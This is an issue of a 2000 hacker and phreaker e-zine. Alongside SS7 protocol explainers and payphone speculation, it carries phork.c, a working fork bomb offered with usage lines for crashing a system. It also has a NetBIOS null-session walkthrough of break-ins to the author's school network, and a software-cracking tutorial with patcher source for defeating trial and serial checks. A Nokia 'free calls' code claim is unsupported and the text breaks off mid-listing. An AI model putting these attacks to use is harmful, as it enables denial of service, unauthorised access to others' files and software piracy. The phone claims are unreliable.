Copy Link
Add to Bookmark
Report
infosurge Issue 03
_ __
(_)_ __ / _| ___ ___ _ _ _ __ __ _ ___
| | '_ \\\\| |_ / _ \\\\/ __| | | | '__/ _` |/ _ \\\\
| | | | | _| (_) \\\\__ \\\\ |_| | | | (_| | __/
|_|_| |_|_| \\\\___/|___/\\\\__,_|_| \\\\__, |\\\\___|
|___/
.------------- ----------------.
: Official Irc Channel -> #phreak/AustNET (irc.austnet.org):
: Official Web Site -> http://infosurge.rendrag.net :
: Official Submissions -> phase5@beergrave.net :
: Official Fed -> m3 :
: :
: issue #3: 25/03/2000 :
.__________________________________________________________.
"New school tekniq with twice the wang of the nearest competitor"
............................[ Table Of Contents ]...........................
[Intro ............................................................... phase5]
[Editorial ........................................................... phase5]
[Simple Nokia Trick ................................................ jacknife]
[Multimedia Phones ................................................... jestar]
[Advanced SS7 - The OSI Layers ....................................... phase5]
[phork.c ............................................................ ghengis]
[NetBios Penetration ............................................... PuManChu]
[Advanced SS7 - Signaling Units ...................................... phase5]
[Basic Cracking Tutorial ............................................. PSyOPS]
[Schools and NT .................................................. Prosthetic]
[JCE ................................................................. phunki]
[Outro ............................................................. phase5]
[Total ................................................. infosurge (68.9kb)]
.................................[ shouts ].................................
[ Shard jestar lymco secroth ghengis sour insane hanz3r bsdave caddis ]
[ insane MistaEckz assass|n Prosthetic Excalibur ^OpTiX^ tux galapogos01 ]
[ wrath Niffum TheCzar TragicGod saboteur Rendrag VortexV void_ v64 ]
[ PuManChu Deicidal phunki concat ]
........[ Editorial ].................................[ phase5 ]............
we're back again with yet another juarez packed issue. This issue was a bit
later than the previous ones, and the following issues will probably follow
suite. Hopefully you can expect infosurge issues to be released roughly
monthly, though as things stand issues will most likely be every 1.5-2 months.
We are still desparetly in need of articles. That was one of the reasons for
the late release this time. As you can see from this issue, we accept articles
on a wide variety of topics. This issue was put together a bit poorly and you
can blame my laziness for that. There were also some mistakes in the past
issues, regarding where the zine is hosted, etc. The email addy is
'phase5@beergrave.net' and the site is 'http://infosurge.rendrag.net'.
Finally, send me some articles.
........[ Simple Nokia Trick ].......................[ jacknife ]...........
Well you probably wonder how to put the odds in your favour and do something
fancy with your phone, well ive looked into a few things after been told by
another person about this simm code trick. This code has been discussed time
and time again but this article is for those of you who dont know and besides
that, hasnt been done in the info surge issues.
Works on certain nokia mobile telephones, (5110 and most released around that
same time), some new models do work
by typing the code: *#746025625# in the standard menu, you will know if it has
worked if the message "Sim Card Stop Allowed" Appears. Through my viewings of
this, the following code is irreversable unless you connect it to your
computer (the phone that is) and that it will either give Free Phonecalls, for
about 3 mins (International & Local), or Give you extra battery life it does
not however do anything that can cause you financial harm or problems etc
(scamming).
tid-bits: Another code is on nokias is *#06# which reveals your mobile
Telephone serial code witch is unique with every mobile of course, and is how
your carrier tracks you
........[ Multimedia Payphones ]......................[ jestar ]............
___________________________
Background Info
Some time last year I saw one of these for the first time at a local
shopping centre and it immediately got my attention, it was sitting
in a payphone stand but it was not like any payphone I'd seen before.
It had a touch screen, and no keypad at all. The payphone stand had
multimedia payphone on the top.
So of course I got onto the phone and got stuck into looking around
at what they could do.... heres the info.
Also, those of you in that are anywhere other than Adelaide or Sydney
will probably have to wait for a while to even see one of these phones
as the are still in trial stages as far as i'm aware and the trial
is only in the places i mentioned earlier.
Oh, and the case numbers have K2 at the end of the number, that is why
I am calling them K2 phones, that and the fact it is much easier than
typing "multimedia payphone" everytime i want to refer to one.
___________________________
The Facts (aka stuff proved beyond doubt)
I have managed to pick up some info on the tech specs of these phones.
First thing to realise is that this is the *base* model, so newer
phones may have more advanced technology inside them.
Base model is a PC with 32 meg of ram and a 2.2gig hdd.
Each phone has both a data line and a voice line running to the phone.
At the moment the data line is a dialup modem, but the phones and
cases have the facility to use either ISDN or cable data lines sometime
in the future.
A 12" colour touchscreen, which is used to navigate the various
information services available on the payphone, and also used to dial
numbers on the phones. The screen is 12mm thick.
The computers that these phones are powered by run Windows NT 4.0 for
their operating system.
Each phone has a 112mm thermal printer, which is not actually used in
any of the K2's I've seen, but is there for use with features yet to
be implemented. They also contain stereo speakers, which have been
turned up loud on some of the k2's i've been on while turned down on
some others.
Those are all the things that I have found out for sure about them.
Now onto the speculations I have about them.
_____________________________
Speculations
Ok, I know these phones dial up. I have heard the normal modem dialing
tones and then the handshake of a computer being connected. I am
currently in the process of getting a recording of the number these
phones dial into, and if anyone else can manage to get a recording and
decode it I would like to hear from you to compare numbers. One thing
for anyone who wants to try and get a recording, from what I can gather
the phones dial in once first thing in the morning, and stay connected
all day so consequently you will need to be the first one to use the
phone for the day to get the recording.
I assume that these phones are connected to some sort of telstra
intranet, rather than than the actual internet, as they wouldnt want
people to be able to connect to the payphone from their home computer.
Also, the login/pass information would need to be stored on the payphone
somewhere (that is assuming that the system is password protected and not
set to accept all connections, and I am assuming this because I dont
think telstra are that dense). Now, I dont know how connected this
"intranet" would be to other telstra networks, but I would assume that
all k2's would be on the same network, so it may be interesting non the
less.
Through messing around on one of these phones I managed to cause the
web browser they use to crash due to java errors (no, I havent been
able to recreate that) and this revealed to me that they run some form
of Microsoft Internet Explorer, with java enabled. This probably opens
up a load of possibilities for general phone buggery.
____________________________
In closing..
Well, I guess a lot of you are thinking "Well i'm going to flog one of
these, tear it apart and really go to town" and believe me I would love
to know what you find out if someone actually manages to do that, but
theres a problem. These phones are only deployed in high traffic areas,
and by high traffic areas I mean shopping centres, librarys, airports
etc. That makes it nigh on impossible to even have a decent look at one
let alone steal one without drawing attention to yourself.
Other than that, you now know everything about these phones that I do,
and also now know my theories on these phones. If you find out anything
more I would really appreciate you mail me the info.
____________________________
Linkage
Telstra Research Labs official page for these phones.
http://www.telstra.com.au/research/h_multim.htm
(c)2000 Jestar.
........[ Advanced SS7 - Signaling Units ]............[ phase5 ]............
. intro
. what are signaling units / types of signaling units
. message signaling unit
. link status signaling unit
. fill-in signaling unit
. acronyms summary
. outro
. intro
This article is kind of a follow-up to my article 'Introduction to SS7'. I
would recommend that you read that first so that you have a basic overview of
the SS7 signaling architecture. In this file, I will go a bit more in-depth
with SS7. I will discuss the actual signals that are used in signaling, with
some information on packet structure and types as well.
. what are signaling units
When signaling is done over SS7 it is done using signaling units. Signaling
units are like messages that are sent back and forth over the signaling link.
The SS7 protocol has 3 types of signaling units. These three are fill-in
signaling units, message signaling units and link status signaling units.
These three units make up the basis for all messages over SS7.
. transmitting on SS7
All transmission happens using 8-bit bytes(octets). To seperate signaling
units from each other there needs to be a way to tell when one signal ends and
another begins. A unique bit pattern was devised for this purpose. It is
referred to as the flag. Now typically, you would assume messages would go
like this:
start message end start message end start message end
however with SS7 only one flag is used to signal both the end and start of
messages. In this way transmission would look like:
flag message flag message flag message flag
whereby the flag would indicate end/start. Using this method one flag is used
to indicate both a footer and a header in one. The flag used to indicate this
is the pattern '01111110'. Obviously, this pattern could very easily crop up
in a message, which would completely screw up transmissions. Therefore bit
manipulation techniques are used so that a message does not contain this
pattern. Once the message is received the bit manipulation is reversed and the
message reconstructed.
. message signaling unit
This is where the work is really done. MSU's are used for basically every
function of SS7. Because they do so much work, MSU's themselves are split up
into several types. Before I explain about them however, I will show the
basic packet structure of an MSU. The size of each segment is also specified.
.----------------------------------------------------------------------------.
| flag | BSN/BIB | FSN/FIB | Length | Service Info. | Signaling | Check |
| | | | Indicator | Octet | Info. Field | Sum |
`----------------------------------------------------------------------------'
1 octet 1 octet 1 octet 1 octet 1 octet 8-272 octets 1 octet
I will do a quick run-down on each segment.
flag - This has already been discussed above. Used to start/end SU's
BSN/BIB & FSN/FIB
These two segments go together. To make sure SU's are being received these two
octets are used as verifiers. Whenever a SU is sent out a sequence number is
given to it. This number is placed in the FSN/FIB segment. There are 7 bits
assigned to the FSN. This can hold up to 128 unique values. Therefore there
must be acknowledgement of receival at least every 128 messages. Until an SU
is acknowledged, a copy is saved at the transmitter incase it needs to be
resent. Once it has been acknowledged then that sequence number becomes
available again. To acknowledge that it has successfully received an
in-sequence packet the receiver will place the sequence number of the last
packet that was acknowledged in the BSN. The FIB/BIB is used to specify if
data-corruption has occured and to request a re-send.
Length Indicator
This is the number of octets between itself and the checksum. Only 6 of the 8
bits are used so only numbers up to 63 can be stored. Any MSU's with more than
63 octets are specified as 63.
Service Information Octet
This is basically a type identifier. It is split into two parts of 4 bits.
The first part, the subservice field, contain the network indicator (national
or international) and the priority (0-3, 0 is lowest, 3 is highest). Low
priority messages may be discarded during congestion. Also, test messages have
a higher priority than messages used for call setup.
The second part is the service indicator(mtp,sccp,etc).
Service Info. Field
This is where the actual information is stored. The first 7 octets are the
same for all MSU types. These contain information such as originator,
destination, and which links to use. This 7 octet section is known as the
routing label. It basically looks like this.
.----------------------------------------------------------------------------.
| destination point code | originating point code | signaling link selection |
| | | |
`----------------------------------------------------------------------------'
3 octets 3 octets 1 octet
The destination point code (DPC) contains the address of where the message is
to be sent to. The originating point code (OPC) contains the address of the
source of the message. The signaling link selection (SLS) is used to the
message is sent over currently unused links or an unused link from a mated
pair.
The rest of the data in this segment is the actual data that is being
transmitted.
. link status signaling unit
First of all, I will show the basic structure of an LSSU packet. It is quite
similiar to a MSU.
.-----------------------------------------------------------------------.
| flag | BSN/BIB | FSN/FIB | Length Indicator | Status Field | CheckSum |
| | | | | | |
`-----------------------------------------------------------------------'
1 octet 1 octet 1 octet 1 octet 1-2 octet(s) 1 octet
As you can see this has most the basic components of a MSU. It is only missing
the data segments. It does however, introduce another segment, the Status
Field.
A signaling link has two ends. These two ends are independant of each other.
LSSU's are used as a way for one end to communicate with the other. LSSU's
provide information such as the quality of received signaling traffic, the
status of the two end points and other information about the signaling link.
All this information is stored in the Status Field.
You will notice that the LSSU does not have a Routing Label. This is because
they are only transmitted between two points of a link. They do not need to be
routed anywhere. Also the length indicator is either 1 or 2.
. fill-in signaling unit
As the name would suggest, these SU's are used to fill-in gaps in transmission.
When no MSU's or LSSU's are being sent the FISU's are sent back and forth
constantly. They are also useful for checking the link, while it is idle. A
FISU packet still contains the basic components of other SU's because they
are also acknowledged and such in the usual way. This forms yet another form
of error checking, making sure packets are being correctly received.
.--------------------------------------------------------.
| flag | BSN/BIB | FSN/FIB | Length Indicator | CheckSum |
| | | | | |
`--------------------------------------------------------'
1 octet 1 octet 1 octet 1 octet 1 octet
These packets contain no payload. The Length Indicator is always 0. The rest
is standard to the SS7 generic packet structure.
. acronyms summary
Here is a list of the acronyms used in this text.
BIB - backward indicator bit
BSN - backward sequence number
DPC - destination point code
FIB - forward indicator bit
FISU - fill-in signaling unit
FSN - forward sequence number
LSSU - link status signaling unit
MSU - message signaling unit
OPC - originating point code
SLS - signaling links selection
SS7 - signaling system 7
SU - signaling unit
. outro
That will probably be the last article on SS7 that I write in a while. By now
you should understand the concept of signaling and packet-switching
signaling networks (specifically SS7). If you have any comments, questions,
etc regarding this article or SS7 in general than feel free to email me
(phase5@beergrave.net).
.eof.
........[ phork.c ]..................................[ ghengis ]............
/*
* phork.c - <ghengis/ghengis@wewt.net>
*
* description;
* This tool will fork() the system and bring a system down too it's death
* no programs or processes will be able to run, causing total chaos as
* you can imagine.
*
*:---
*
* usage;
*
* $ make phork
* $ echo "HoHoHO, j00 g0Nna d13 b14TcH!"|wall ; ./phork &
*
*:---
*
* werd;
* crisen, phase5, pyro, tron, k, excalibur, insane, geewiz, sour, wrath
* g^style, teek, xaviour, wewted, exo, niffum, lymco, xl, neekforce
*
*:---
* AustNET IRC, irc.austnet.org
* #phreak, #leet, #unix, #ozsecurity, #neekfu
*:---
*
* Copyright (c) 2000, Skope Enterprise
*
*/
#include <unistd.h>
int main()
{
printf("ph0rk by gh3ng15, n0w f0rk1ng th1s b14tch...\\\\n");
if (!fork()) {
fork();
}
main();
}
........[ NetBIOS Penetration ]......................[ PuManChu ]...........
-__Introduction__-
Here is an attempt by me to demonstrate the techniques and penetration
of an NT machine or Network via NetBIOS.
This is not meant for people who are new to security and will require
some understanding of what i am talking about because i
am not going through it every basic spec and i will be
prone to skipping a few parts because it's a lot harder to
put it into text than to actually perform the task. Anyway, i will continue.
-__Discussion__-
First you need to know how to use Nbtstat.
I will show the results of query sessions and the penetration of
the NT machine on my schools network.
First thing you need to do is make a NBTSTAT query to the machine.
C:\\\\>nbtstat -A 10.77.25.24
Name Type Status
---------------------------------------------
NTBOX <00> UNIQUE Registered
PUMANNETWORK <00> GROUP Registered
NTBOX <00> UNIQUE Registered
MAC Address = 00-00-00-00-00-00
Now from the result table above you can see 2 things. The machine name
and the group it belongs to. The next step you would get from this
is possible usernames or computer names to make a null IPC session.
The IPC$ share is a standard hidden share on NT for server to server
communication. Yet, we can use this to our advantage.
To make a null IPC connection do this.
C:\\\\>net use \\\\\\\\10.77.25.24\\\\ipc$ "" /user:""
If the connection is successful the user can do a number of things to
get a current username list. But i wont go in depth into that.
Now we can get what shares are available on the local machine as
you would want to. It is accomplished like this.
C:\\\\>net use \\\\\\\\10.77.25.24\\\\ipc$ "" /user:""
The command completed successfully.
Then we do.
C:\\\\>net view \\\\\\\\10.77.25.24
Shared resources at \\\\\\\\10.77.25.24
Share name Type Used as Comment
-------------------------------------------------------------------------------
Accelerator Disk Agent Accelerator share for Seagate backup
Inetpub Disk
NETLOGON Disk Logon server share
www_pages Disk
The command completed successfully.
Now as you can see, The shares werent available to view until the IPC
connection was made.
Now that you have a list of remote shares you can map to them.
The mapping will only work if the shares are unpassworded or shared
out to the 'Everyone' group.
To map to the drive do as so:
C:\\\\>net use g: \\\\\\\\10.77.25.24\\\\inetpub
You will now have a g: and be able to connect to it freely as if it
was a fixed disk on your computer.
The vulnerability is widely overlooked in most schools and in some cases
webserver and major networks. Below is a cut and paste of a MS-DOS
session i had without any of my typing in between. This is to a normal
slave machine, not a web server or anything with importance.
------------------------------Start Session----------------------------
C:\\\\>net view \\\\\\\\WSB61125
Shared resources at \\\\\\\\WSB61125
Share name Type Used as Comment
-------------------------------------------------------------------------------
\\\\\\\\Users\\\\year_10\\\\y10share Disk
\\\\\\\\Users\\\\year_10\\\\pek01 Disk
The command completed successfully.
C:\\\\>net use \\\\\\\\WSB61125\\\\ipc$ "" /pek01:""
The command completed successfully.
C:\\\\>net view \\\\\\\\WSB61125
Shared resources at \\\\\\\\WSB61125
Share name Type Used as Comment
-------------------------------------------------------------------------------
\\\\\\\\Users\\\\year_10\\\\y10share Disk
\\\\\\\\Users\\\\year_10\\\\pek01 Disk
The command completed successfully.
C:\\\\>net use x: \\\\\\\\WSB61125\\\\Users\\\\year_10\\\\pek01
--------------------------------End Session----------------------------
With just that there i could access their user space and freely do what
i wish. This is my school network. The setup is poor and passwords to
be found anywhere are very rare. It is one very vulnerable network.
Please dont decide to start bombing me with mail saying it doesnt work
it wont do this, this doesnt work, you are full of crap. As i said
above this is my attempt to demonstrate it. If it messed up in some
parts im sorry, but it's a lot harder to put it in text than to do it.
- Pu Man Chu -
........[ Advanced SS7 - Signaling Units ]............[ phase5 ]............
. intro
. The Layers
. Message Transfer Part
. ISDN User Part
. Signaling Connection Control Part
. Transaction Capabilities Application Part
. Operations, Maintenance and Administration Part
. acronyms
. outro
. intro
In this article I will go over the layers of SS7 in more detail. This will
give you an understanding of how the whole network is put together. This will
also touch on subjects discussed in 'Advanced SS7 - Signaling Units'.
. The Layers
There are varying amount of layers in SS7 depending on how you look at it.
We will be looking at 5, which are the most common. Often these layers are
combined to designate another layer (ie User and Application Part)
* Message Transfer Part
* ISDN User Part
* Signaling Connection Control Part
* Transactions Capabilites Application Part
* Operations, Maintenance, and Administration Part
. Message Transfer Part
This section is made up of 3 protocol levels. It provides a service for the
other parts and transfers messages(signaling units) to various parts of the
network.
Level 1
This is the Signaling Data Link. This is the physical part of the links, but
not the endpoints. They are digital links transferring at 56kps or 64kps.
Level 2
This is the Signaling Link. This is where signaling units are transfered.
Transfer occurs using a binary protocol. This part is covered in more detail
in 'Advanced SS7 - Signaling Units'.
Level 3
This layer controls routing of messages. It includes network functions such
as the routing label. It routes messages to their various destinations. Also,
network management occurs here. It makes sure there is no congestion through
effective link selection for routing, as well as passing link status to other
signaling points. Also takes care of failed links, correcting errors and other
reliability issues.
. ISDN User Part
The ISUP defines the protocol and procedures for call setup, management and
termination over the PSTN. It handles both ISDN and non-ISDN calls. In my
first SS7 article I showed a basic call example. That was ISUP. I did not
show the messages sent in that example and I wont bother showing them here
as they convey little information about SS7. Looking at the packet, the ISUP
message format is carried in the SIF. It contains the standard routing label
followed by the circuit identification code(CIC). This is then followed by
the message type.
. Signaling Connection Control Part
This provides services about MTP. It allows messages to be sent to a specific
application at a destination, where as a MTP only allows routing to a
destination. The applications are reffered to as subsystems. SCCP is used as
the transport for TCAP services. The SCCP type is stored in the SIF field of
a MSU. It is one octet long.
. Transactions Capabilites Application Part
This is a set of services that use SCCP for transport. This provides extended
features. Some examples are determining routing for 13 XX XX calls. These
numbers automatically route to a local number. TCAP provides the queries
between SSP and SCP. In an MSU, the TCAP message is in the SCCP portion. It
has two parts, the Transaction Portion and the Component Portion.
Transaction Portion
This part contains the type identifier. There are seven types:
Unidirectional: One direction only. There is no reply to this type.
Query with Permission: Start a TCAP transaction where anyone can terminate.
Query without Permission: Starts a TCAP transaction where origin can terminate.
Response: End transaction
Conversation with Permission: Continue transaction where anyone can terminate
Conversation without Permission: Continue transaction where origin can terminate
Abort: Self explanatory
Component Portion
There are 4 components.
Invoke: Invokes an operation.
Return Result: Returns the result of an invoked operation.
Return Error: Reports a failed operation.
Reject: Incorrect type or component.
. Operations, Maintenance, and Administration Part
OMAP is used for various things including: Routing data management, SCCP route
verification and link failure management. It uses the connectionless services
of TCAP.
. acronyms
CIC - circuit identification code
ISUP - ISDN user part
MSU - message signaling unit
MTP - message transfer part
OMAP - operations, maintenance, and administration part
SCCP - signaling connection control part
SS7 - signaling system 7
TCAP - transactions capabilites application part
. outro
I planned to make this my last file on SS7, however there may be another one
or two to go over more specific details and to summarise all the components
of SS7. If you have any questions about SS7 or this article feel free to mail
me (phase5@beergrave.net)
. eof .
........[ Basic Cracking Tutorial ]...................[ PSyOPS ]............
Welcome to a tutorial by Spyderco Psyops.
This tutorial isn't - like almost everyone else - about one specific program.
In this tutorial I will try to raise your skills as cracker.
Just read, and if there is something you don't understand, then read it again.
Most of the text we will fight us self through is for beginners, for the more skilled
people, I refer to some of my tutorials on cracking java.
This tutorial contains:
[1] Basic of Win32Dasm
[2] Basic of SmartCheck
[3] Basic of Hiew
[4] Basic of SoftICE
[5] How to patch using Pascal
[6] How to patch using ASM
[7] FAQ
[8] Good tools to have
[9] Contacting Psyops
[1]: Basic of Win32Dasm:
------------------------
Win32Dasm is one of the most forceful windows disassembles on the market.
Normally its being used by programmers, but it can also be used to cracking, which I will try to teach you here.
To disassembler a program, you simply need to open Dasm, press Disassembler, Open and choose your file.
When its loaded, which probably take some time, next thing is to find the offset you need to change.
Ordinarily you use Dasm if the programs protection is: Timelimit, serial fix, or Nag.
Let's take an example. Timelimit, when the 30days trial period is over, you will get a text box saying
that its expired and you can't use it anymore. In this example it says "Sorry, trial period is expired
please register", to find this we look in Refs, String Data References (SDR). Here you can look after
so called strings in the program.
We found "Sorry, trial period is expired please register", and when we double click on it, we see this:
* Possible StringData Ref from Data Obj ->"Sorry, trial period is expired please register"
|
:004041BA 6830834400 push 00448330
This we don't care about, but scroll up a bit till you come to the next, which in this case is:
* Referenced by a (U)nconditional or (C)onditional Jump at address:
|:00404158(C)
We need 404158, now Shift F12 (Goto code location) and enter 404158.
Usually you will get to a JE. This is what we need. Then double click on the JE so it turns green.
Look at the buttom in Dasm, which will say:
Line: xxxx Pg xx and xx of xxx Code Data @:xxxxxxxxx @Offset xxxxxxxxxh in File xxxxxxxx.exe
Which will say: Line: "line" Pg "page" and "page" of "total" Code Data @:"Data Code" @Offset: "Offset" in File "File.exe"
We concentrate on the offset, write it down or remember it.
In this example the offset is: 4B5A.
Now goto the Hiew section, on how to change the JE.
[2] Basic of SmartCheck:
------------------------
Setup:
It is very important that SC is set up right. So check this:
First goto Program, then Settings where you should fill everything, next in the Settings push
Reporting and fill out everything except Report MouseMove events from OCX controls.
And you're ready to begin.
How to open and run a program:
First you goto File and push open, next you choose the file you want to run.
When you get this press F5 to run the program.
Asc:
Normally when you're open a program with Name & Serial protection you will get the Asc for each character.
With a protection with only Serial you should look in the box's right before you get the Error Message.
[3] Basic of Hiew:
------------------
Opening a program in HIEW:
Find Hiew.exe and run it, now you should stand in the directory called C:\\\\Directory of Hiew\\\\
Choose the program you want to crack/look in and push Enter.
How to operate in Hiew:
And the bottom line there will be a line with numbers like 1(Help) 2(Unwrap)
And so on you should only concentrate at the 4(Mode), Now try to press F4 and you will
see a dialog box come with the choices: Text, Hex and Decode. Normally when you have
found the offset (look in my W32Dasm section) you will have to change it.
To do this choose Decode, and all the functions below have changed, so now is F3 (Edit)
and F5 (Goto) F7 (Search) And so on...
If you already have the offset to change press F5 and enter the offset that you got,
and you will land where you should.
Now if you press F3 (Edit) you can change it, and if you now type F2 (in the Edit) you will see F2 (Asm).
For a normal patch it should be something with a je that should be changed to jne.
Now type F3 where you land after typing the offset, and simply write 75 (0F85) instead of 74 (0F84),
now when your done push F9 (Update, Also Safe), And simply quit Hiew with F10 (Quit).
Now run the program and if you have changed it right there should not be anymore.
Ok, now we got that straight. Let's try an example.
We found the offset (look in the Dasm section on how), and now we want to make changes.
Our offset in this example is: 4B5A. Open Hiew press F9 (Open)
find the program you want to change in and press Enter, Now your in Text mode,
push Enter Twice to get in Decode section, Push F5 and enter the offset.
Then we will land in something that looks like this:
:0040415843 7443 JE
or something like it. Now we change the 74(JE is also 84 sometimes) into a JNE.
To do this you push F3 (edit) and simply change 74 to 75.
Then push F9 (upload) and quit Hiew.
Then you're done.
[4] Basic of SoftICE:
---------------------
Finally we got to the SoftICE section.
First we need to configure Winice.dat.
Here is my winice.dat for SoftICE 4.01
**** Cut from my Winice.dat ****
PENTIUM=ON
NMI=ON
ECHOKEYS=OFF
NOLEDS=OFF
NOPAGE=OFF
SIWVIDRANGE=ON
THREADP=ON
LOWERCASE=OFF
WDMEXPORTS=OFF
MONITOR=0
PHYSMB=128
SYM=1024
HST=256
TRA=8
MACROS=32
DRAWSIZE=2048
INIT="X;"
F1="h;"
F2="^wr;"
F3="^src;"
F4="^rs;"
F5="^x;"
F6="^ec;"
F7="^here;"
F8="^t;"
F9="^bpx;"
F10="^p;"
F11="^G @SS:ESP;"
F12="^p ret;"
SF3="^format;"
CF8="^XT;"
CF9="TRACE OFF;"
CF10="^XP;"
CF11="SHOW B;"
CF12="TRACE B;"
AF1="^wr;"
AF2="^wd;"
AF3="^wc;"
AF4="^ww;"
AF5="CLS;"
AF8="^XT R;"
AF11="^dd dataaddr->0;"
AF12="^dd dataaddr->4;"
CF1="altscr off; lines 60; wc 32; wd 8;"
CF2="^wr;^wd;^wc;"
; WINICE.DAT
; (SIW95\\\\WINICE.DAT)
; for use with SoftICE Versions greater than 3.0 (Windows 95)
;
; *************************************************************************
; If your have MORE than 32MB of physical memory installed, change
; the PHYSMB line to the correct # of Megabytes.
; If you have LESS than 32MB you can save a bit of memory by
; specifying the correct # of Megabytes
; Example: PHYSMB=32
; *************************************************************************
; ***** Examples of sym files that can be included if you have the SDK *****
; Change the path to the appropriate drive and directory
;LOAD=c:\\\\windows\\\\system\\\\user.exe
;LOAD=c:\\\\windows\\\\system\\\\gdi.exe
;LOAD=c:\\\\windows\\\\system\\\\krnl386.exe
;LOAD=c:\\\\windows\\\\system\\\\mmsystem.dll
;LOAD=c:\\\\windows\\\\system\\\\win386.exe
; ***** Examples of export symbols that can be included *****
; Change the path to the appropriate drive and directory
EXP=c:\\\\windows\\\\system\\\\vga.drv
EXP=c:\\\\windows\\\\system\\\\vga.3gr
EXP=c:\\\\windows\\\\system\\\\sound.drv
EXP=c:\\\\windows\\\\system\\\\mouse.drv
EXP=c:\\\\windows\\\\system\\\\netware.drv
EXP=c:\\\\windows\\\\system\\\\system.drv
EXP=c:\\\\windows\\\\system\\\\keyboard.drv
EXP=c:\\\\windows\\\\system\\\\toolhelp.dll
EXP=c:\\\\windows\\\\system\\\\shell.dll
EXP=c:\\\\windows\\\\system\\\\commdlg.dll
EXP=c:\\\\windows\\\\system\\\\olesvr.dll
EXP=c:\\\\windows\\\\system\\\\olecli.dll
EXP=c:\\\\windows\\\\system\\\\mmsystem.dll
EXP=c:\\\\windows\\\\system\\\\winoldap.mod
EXP=c:\\\\windows\\\\progman.exe
EXP=c:\\\\windows\\\\drwatson.exe
; ***** Examples of export symbols that can be included for Windows 95 *****
; Change the path to the appropriate drive and directory
EXP=c:\\\\windows\\\\system\\\\kernel32.dll
EXP=c:\\\\windows\\\\system\\\\user32.dll
EXP=c:\\\\windows\\\\system\\\\gdi32.dll
EXP=c:\\\\windows\\\\system\\\\comdlg32.dll
EXP=c:\\\\windows\\\\system\\\\shell32.dll
EXP=c:\\\\windows\\\\system\\\\advapi32.dll
EXP=c:\\\\windows\\\\system\\\\shell232.dll
EXP=c:\\\\windows\\\\system\\\\comctl32.dll
EXP=c:\\\\windows\\\\system\\\\crtdll.dll
EXP=c:\\\\windows\\\\system\\\\version.dll
EXP=c:\\\\windows\\\\system\\\\netlib32.dll
EXP=c:\\\\windows\\\\system\\\\msshrui.dll
EXP=c:\\\\windows\\\\system\\\\msnet32.dll
EXP=c:\\\\windows\\\\system\\\\mspwl32.dll
EXP=c:\\\\windows\\\\system\\\\mpr.dll
**** Cut from my Winice.dat ****
Normally there is a ; before the EXP's like this:
;EXP=c:\\\\windows\\\\system\\\\mpr.dll
; means disabled, so if you don't delete those it will be the same as not having them.
Afterwards you need to secure your Autoexec.bat is set-up right.
Add this line in Autoexec.bat: c:\\\\pathtoSoftICE\\\\Winice.exe
Restart and your ready to begin.
When this is done open Loader32.exe, goto File, Open Module, then Module and Load.
No need for that anymore, you can now execute SoftICE by pushing: Ctrl + D.
In the programs we will use is the protection Name & Serial.
Do not use Visual Basic programs with SoftICE, use SmartCheck for VB apps.
These breaks a often used:
GetWindowText / GetWindowTextA
GetDlgItemText / GetDlgItemTextA
These breakpoints are used in about 90% of all programs you will meet.
Now lets go into SoftICE, Push Ctrl + D when you got your program running with registration box.
Type BPX GetWindowTextA, And BPX GetDlgItemTextA
Now push F5(Go). If you should get an error msg, you got Winice.dat wrong.
Fill out the registration box and SoftICE should pup up.
Type R to see Data and Registration Windows.
Press F11 to trace the call.
If you remember the functions below, you're on your way to the elite.
F8 = Trace Into
F10 = Trace Over
F11 = Return
? EAX = Show EAX info
D EAX = Show EAX info
S 0 L XXXXXXXXXX "String"
S 0 L XXXXXXXXXX XX,XX,XX,XX (XX = HEX)
I think that was about the basic in SoftICE, for more questions mail me.
[5] How to patch using Pascal:
------------------------------
Pascal is/was one of the most used tools to code the cracks in, many people still use Pascal.
I.e. Crackers. That is why I want to teach you how to make a crack in Pascal.
**** Source code to a 2 Byte Crack ****
Programname PATCH; <- Put in the program name
Uses
Crt; <- It use Crt
Const A: Array[1..1] of Record <- Description of Byte 1
A : Longint;
B : Byte;
End=((A:$XXXX;B:$XX)); <- A = Offset (Byte1), B = Byte (Byte1)
C: Array[1..1] of Record <- Description of Byte 2
D : Longint;
E : Byte;
End=((D:$XXXX;E:$XX)); <- D = Offset D(Byte2), E = Byte(Byte2)
Txt:array[0..3] of byte =($XX,$XX,$XX,$XX); <- Text in HEX
Var Ch:Char;
I:Byte;
F:File;
Size:Longint;
{ GemExitProc: Pointer;}
begin
Assign(F,'EHM.EXE'); <- Instead of EHM.EXE type in the filename to patch
{$I-} Reset(F,1);{$I+}
If IOResult <> 0 then
begin
writeln('Can Not find EHM.EXE'); <- This is saying if it isn't the right filesize
halt(1);
end;
For I:=1 to 1 do <- Here we start Byte1
begin
Seek(F,A[I].A);
ch:=Char(A[I].B);
Blockwrite(F,Ch,1);
end; <- Ends byte1
For I:=1 to 1 do
begin <- Starts byte2
Seek(F,C[I].D);
ch:=Char(C[I].E);
Blockwrite(F,Ch,1);
end; <- Ends byte2
begin
Seek(f,$XXXX);
Blockwite(f,txt,4);
end;
Writeln('Patching Complete!'); <- What do say if complete patched
end.
**** Source code to a 2 Byte Crack ****
Try to go through the code, and you will see that it isn't that hard to code a crack.
If you still can't code, then get tHE EGOiSTE's patcher.
[6] How to patch using ASM:
---------------------------
ASM is with time getting bigger and bigger, the most crackers use ASM to code.
My personal favourite is also ASM, if you want good coding then learn ASM,
here is a little source to a crack coded in ASM.
**** Source to a 1 byte crack in ASM ****
; - Original Code - ;
DOSSEG
.MODEL SMALL
.STACK 500h
.DATA
.CODE
PatchL EQU 6
Buffer Db PatchL Dup(1)
handle dw ?
intro db "Coded By YOU!",0dh,0ah,"Crack for "programname + version" Cracked By ME$"
FileName db "PROGRAM.EXE",0 <- Put in the FileName.
notfound db 0dh,0ah,"File not found!$" <- Shows when run wrong
cracked db 0dh,0ah,"File Successfully patched. Enjoy!$" <- Shows when its done
Cant db 0dh,0ah,"Can Not Write to File.$ <- Error message
Done db "File has been made.$"
String db 075h,0 <- "75" Byte to be patched
START:
mov ax,cs
mov ds,ax
dx,offset intro ;point to the time prompt
mov ah,7 ;DOS:print string
int 21h
jmp openfile
openfile:
mov ax,cs
mov ds,ax
mov ax,3d02h
mov dx,offset FileName
int 21h
mov handle,ax
cmp ax,02h
je filedontexist
jmp write
filedontexist:
mov ax,cs
mov ds,ax
mov dx,offset notfound
mov ah,9 ;DOS:print string
int 21h ;display the time prompt
jmp exit
Write:
mov bx,handle
mov cx,0000h
mov dx,3DCDh <- Offset "3DCD"
mov ax,4200h
int 21h
mov cx,patchl
mov dx,offset String
mov ah,40h
mov cx,01h
int 21h
mov ax,cs
mov ds,ax
mov dx,offset cracked
